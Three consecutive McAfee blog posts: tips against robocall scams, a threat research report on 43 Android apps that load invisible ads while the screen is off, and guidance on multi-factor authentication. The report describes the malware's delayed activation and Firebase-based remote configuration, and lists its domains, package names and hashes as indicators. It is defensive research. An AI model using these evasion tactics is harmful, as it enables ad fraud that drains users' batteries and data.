In the U.S., unwanted calls rank as the top consumer complaint reported to the Federal Communications Commission (FCC). Partly because scammers have made good use of spoofing technologies that serve up phony caller ID numbers. As a result, that innocent-looking phone number might not be innocent at all.
Whether the voice on the other end of the smartphone is recorded or an actual person, the intent behind the call is likely the same—to scam you out of your personal information, money, or both. Callers such as these might impersonate banks, government agencies, insurance companies, along with any number of other organizations. Anything that gives them an excuse to demand payment, financial information, or ID numbers.
And some of those callers can sound rather convincing. Others, well, they’ll just get downright aggressive or threatening. One of the most effective tools these scam calls use is a sense of urgency and fear, telling you that there’s a problem right now and they need your information immediately to resolve whatever bogus issue they’ve come up with. That right there is a sign you should take pause and determine what’s really happening before responding or taking any action.
Whatever form these unwanted calls take, there are things you can do to protect yourself and even keep you from getting them in the first place. These tips will get you started:
This straightforward piece of advice can actually get a little tricky. We mentioned spoofing, and certain forms of it can get rather exact. Sophisticated spoofing can make a call appear to come from someone you know. Yet more run-of-the-mill spoofing will often use a form of “neighbor spoofing.” The scammers will use a local area code or the same prefix of your phone number to make it seem more familiar. In short, you might answer one of these calls by mistake. If you do answer, never say “yes.” Similarly sophisticated scammers will record a victim’s voice for use in other scams. That can include trying to hack into credit card accounts by using the company’s phone tree. Recordings of slightly longer lengths can also lead to voice cloning using AI-driven tools. In fact, three seconds of audio is all it takes in some cases to clone a voice with up to 70% accuracy.
Apple and Android phones have features you can enable to silence calls from unknown numbers. Apple explains call silencing here, and Android users can silence spam calls as well. Note that these settings might silence calls you otherwise might want to take. Think about when your doctor’s office calls or the shop rings you with word that your car is ready. Cell phone carriers offer blocking and filtering services as well. Carriers often offer this as a basic service by default. Yet if you’re unsure if you’re covered, contact your carrier.
So, let’s say you let an unknown call go through to voicemail. The call sounds like it’s from a bank or business with news of an urgent matter. If you feel the need to confirm, get a legitimate customer service number from a statement, bill, or website of the bank or business in question so you can verify the situation for yourself. Calling back the number captured by your phone or left in a voicemail can play right into the hands of a scammer.
As you can see, scammers love to play the role of an imposter and will tell you there’s something wrong with your taxes, your account, or your bank statement. Some of them can be quite convincing, so if you find yourself in a conversation where you don’t feel comfortable with what’s being said or how it’s being said, hang up and follow up the bank or business as called out above. In all, look out for pressure or scare tactics and keep your info to yourself.
Several nations provide such a service, effectively a list that legitimate businesses and telemarketers will reference before making their calls. While this might not prevent scammers from ringing you up, it can cut down on unsolicited calls in general. For example, the U.S., Canada, and the UK each offer do not call registries.
Scammers and spammers got your number somehow. Good chance they got it from a data broker site. Data brokers collect and sell personal information of thousands and even millions of individuals. They gather them from public sources, public records, and from third parties as well—like data gathered from smartphone apps and shopping habits from supermarket club cards. And for certain, phone numbers are often in that mix. Our Personal Data Cleanup can help. It scans some of the riskiest data broker sites and shows you which ones are selling your personal info. From there, it guides you through the removal process and can even manage the removal for you in select plans.
Hop onto the app stores out there and you’ll find several call blocking apps, for free or at low cost. While these apps can indeed block spam calls, they might have privacy issues. Which is ironic when you’re basically trying to protect your privacy with these apps in the first place.
These apps might collect information, such as your contact list, usage data, and other information about your phone. As with any app, the key resides in the user agreement. It should tell you what information the app might collect and why. It should also tell you if this information is shared with or sold to third parties.
What’s at risk? Should the app developers get hit with a data breach, that information could end up in the wild. In cases where information is sold to analytics companies, the information might end up with online data brokers.
Pay particularly close attention to free apps. How are they making their money? There’s a fine chance that data collection and sale might generate their profits. At some expense to your privacy.
Given that your privacy is at stake, proceed with caution if you consider this route.
A quieter phone is a happy phone, at least when it comes to annoying robocalls.
While blocking 100% of them remains an elusive goal, you can reduce them greatly with the steps mentioned here. Thankfully, businesses, legislators, and regulatory agencies have taken steps to make it tougher for scammers to make their calls. A combination of technology and stiffer penalties has seen to that. Taken all together, these things work in your favor and can help you beat robocallers at their game.
The post How to Beat Robocallers at Their Game appeared first on McAfee Blog.
Authored by SangRyol Ryu, McAfee Threat Researcher
We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?
Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might initially seem convenient for users. However, it’s a clear violation of Google Play Developer policy on how ads should be displayed. This affects not only the advertisers who pay for invisible Ads, but also the users as it drains battery, consumes data and poses potential risks such as information leaks and disruption of user profiling caused by Clicker behavior.
The team has identified 43 apps that collectively downloaded 2.5 million times. Among the targeted apps are TV/DMB Player, Music Downloader, News, and Calendar applications. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Most apps are no longer available on Google Play while others are updated by the developer. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security.
Many affected apps
This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect.
Getting latent period by using Firebase Messaging Service
It is important to be cautious about the implications of granting permissions, such as excluding ‘power saving’ and allowing ‘draw over other apps’. These permissions can enable certain activities to occur discreetly in the background, raising concerns about the intentions and behavior of the applications or libraries in question. Allowing these permissions can result in more malicious behavior, such as displaying phishing pages, also to displaying ads in the background.
Asked permissions to run in the background and keep it hidden
When the device screen is turned off after the latent period, the fetching and loading of ads starts, resulting in users being unaware of the presence of running advertisements on their devices. This ad library registers device information by accessing the unique domain (ex: mppado.oooocooo.com) linked with the application. Then go to Firebase Storage to get the specific advertisement URL and show the ads. It is important to note that this process consumes power and mobile data resources.
Observed traffic when the screen off
If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed.
Example of an advertising site displayed when the screen is off
In conclusion, it is essential for users to exercise caution and carefully evaluate the necessity of granting permissions like power saving exclusion, or draw over other apps before allowing them. While these permissions might be required for certain legitimate functionalities for running in the background, it is important to consider the potential risks linked with them, such as enabling hidden behaviors or reducing the relevance of ads and contents displayed to users because the hidden Clicker behavior. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. For more information, visit McAfee Mobile Security
best.7080music.com
m.gooogoole.com
barocom.mgooogl.com
newcom.mgooogl.com
easydmb.mgooogl.com
freekr.mgooogl.com
fivedmb.mgooogl.com
krlive.mgooogl.com
sixdmb.mgooogl.com
onairshop.mgooogle.com
livedmb.mgooogle.com
krbaro.mgooogle.com
onairlive.mgooogle.com
krdmb.mgooogle.com
onairbest.ocooooo.com
dmbtv.ocooooo.com
ringtones.ocooooo.com
onairmedia.ocooooo.com
onairnine.ocooooo.com
liveplay.oocooooo.com
liveplus.oocooooo.com
liveonair.oocooooo.com
eightonair.oocooooo.com
krmedia.oocooooo.com
kronair.oocooooo.com
newkrbada.ooooccoo.com
trot.ooooccoo.com
thememusic.ooooccoo.com
trot.ooooccoo.com
goodkrsea.ooooccoo.com
krlive.ooooccoo.com
news.ooooccoo.com
bestpado.ooooccoo.com
krtv.oooocooo.com
onairbaro.oooocooo.com
barolive.oooocooo.com
mppado.oooocooo.com
dmblive.oooocooo.com
baromedia.oooocooo.com
musicbada.oouooo.com
barolive.oouooo.com
sea.oouooo.com
blackmusic.oouooo.com
Package Name | Application Name | SHA256 | Google Play Downloads |
band.kr.com | DMB TV | f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1 | 10,000+ |
com.dmb.media | DMB TV | 6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050 | 100,000+ |
dmb.onair.media | DMB TV | a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537 | 10,000+ |
easy.kr | DMB TV | 5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf | 100,000+ |
kr.dmb.onair | DMB TV | e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8 | 5,000+ |
livedmb.kr | DMB TV | 33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107 | 50,000+ |
stream.kr.com | DMB TV | a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769 | 100+ |
com.breakingnews.player | 뉴스 속보 | d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d | 10,000+ |
jowonsoft.android.calendar | 달력 | 46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874 | 10,000+ |
com.music.free.bada | 뮤직다운 | a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931 | 100,000+ |
com.musicdown | 뮤직다운 | 5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16 | 5,000+ |
new.kr.com | 뮤직다운 | 397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66 | 100,000+ |
baro.com | 바로TV | 3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919 | 10,000+ |
baro.live.tv | 바로TV | 760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe | 50,000+ |
baro.onair.media | 바로TV | b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c | 10,000+ |
kr.baro.dmb | 바로TV | 84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765 | 100,000+ |
kr.live | 바로TV | cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc | 1,000+ |
newlive.com | 바로TV | c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf | 50,000+ |
onair.baro.media | 바로TV | 6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9 | 10,000+ |
freemusic.ringtone.player | 벨소리 무료다운 | 75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e | 100,000+ |
com.app.allplayer | 실시간 TV | 8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534 | 50,000+ |
com.onair.shop | 실시간 TV | 1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3 | 50,000+ |
eight.krdmb.onair | 실시간 TV | bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79 | 10,000+ |
free.kr | 실시간 TV | 5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79 | 10,000+ |
kr.dmb.nine | 실시간 TV | ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46 | 100,000+ |
kr.live.com | 실시간 TV | f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7 | 10,000+ |
kr.live.onair | 실시간 TV | e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd | 100,000+ |
kr.live.tv | 실시간 TV | 1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e | 50,000+ |
kr.media.onair | 실시간 TV | bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952 | 100,000+ |
kr.onair.media | 실시간 TV | d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d | 1,000+ |
live.kr.onair | 실시간 TV | b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46 | 10,000+ |
live.play.com | 실시간 TV | 516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922 | 50,000+ |
new.com | 실시간 TV | 5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08 | 50,000+ |
newlive.kr | 실시간 TV | afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb | 100,000+ |
onair.best | 실시간 TV | 6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7 | 50,000+ |
com.m.music.free | 음악다운 | ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2 | 500,000+ |
good.kr.com | 음악다운 | bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91 | 100,000+ |
new.music.com | 음악다운 | fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957 | 1,000+ |
play.com.apps | 음악다운 | b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06 | 100,000+ |
com.alltrot.player | 트로트 노래모음 | 469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c | 50,000+ |
com.trotmusic.player | 트로트 노래모음 | 879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77 | 5,000+ |
best.kr.com | 파도 MP3 | f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5 | 100,000+ |
com.pado.music.mp3 | 파도 MP3 | 9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2 | 100,000+ |
The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.
What does a hacker want with your social media account? Plenty.
Hackers hijack social media accounts for several reasons. They’ll dupe the victim’s friends and followers with scams. They’ll flood feeds with misinformation. And they’ll steal all kinds of personal information—not to mention photos and chats in DMs. In all, a stolen social media account could lead to fraud, blackmail, and other crimes.
Yet you have a strong line of defense that can prevent it from happening to you: multi-factor authentication (MFA).
MFA goes by other names, such as two-factor authentication and two-step verification. Yet they all boost your account security in much the same way. They add an extra step or steps to the login process. Extra evidence to prove that you are, in fact, you. It’s in addition to the usual username/password combination, thus the “multi-factor” in multi-factor authentication.
Examples of MFA include:
With MFA, a hacker needs more than just your username and password to weasel their way into your account. They need that extra piece of evidence required by the login process, which is something only you should have.
This stands as a good reminder that you should never give out the information you use in your security questions—and to never share your one-time security codes with anyone. In fact, scammers cobble up all kinds of phishing scams to steal that information.
Major social media platforms offer MFA, although they might call it by other names. As you’ll see, several platforms call it “two-factor authentication.”
Given the way that interfaces and menus can vary and get updated over time, your best bet for setting up MFA on your social media accounts is to go right to the source. Social media platforms provide the latest step-by-step instructions in their help pages. A simple search for “multi-factor authentication” and the name of your social media platform should readily turn up results.
For quick reference, you can find the appropriate help pages for some of the most popular platforms here:
Another important reminder is to check the URL of the site you’re on to ensure it’s legitimate. Scammers set up all kinds of phony login and account pages to steal your info. Phishing scams like those are a topic all on their own. A great way you can learn to spot them is by giving our Phishing Scam Protection Guide a quick read. It’s part of our McAfee Safety Series, which covers a broad range of topics, from romance scams and digital privacy to online credit protection and ransomware.
In many ways, your social media account is an extension of yourself. It reflects your friendships, interests, likes, and conversations. Only you should have access to that. Putting MFA in place can help keep it that way.
More broadly, enabling MFA across every account that offers it is a smart security move as well. It places a major barrier in the way of would-be hackers who, somehow, in some way, have ended up with your username and password.
On the topic, ensure your social media accounts have strong, unique passwords in place. The one-two punch of strong, unique passwords and MFA will make hacking your account tougher still. Wondering what a strong, unique password looks like? Here’s a hint: a password with eight characters is less secure than you might think. With a quick read, you can create strong, unique passwords that are tough to crack.
Lastly, consider using comprehensive online protection software if you aren’t already. In addition to securing your devices from hacks and attacks, it can help protect your privacy and identity across your travels online—both on social media and off.
The post How to Protect Your Social Media Passwords from Hacks and Attacks appeared first on McAfee Blog.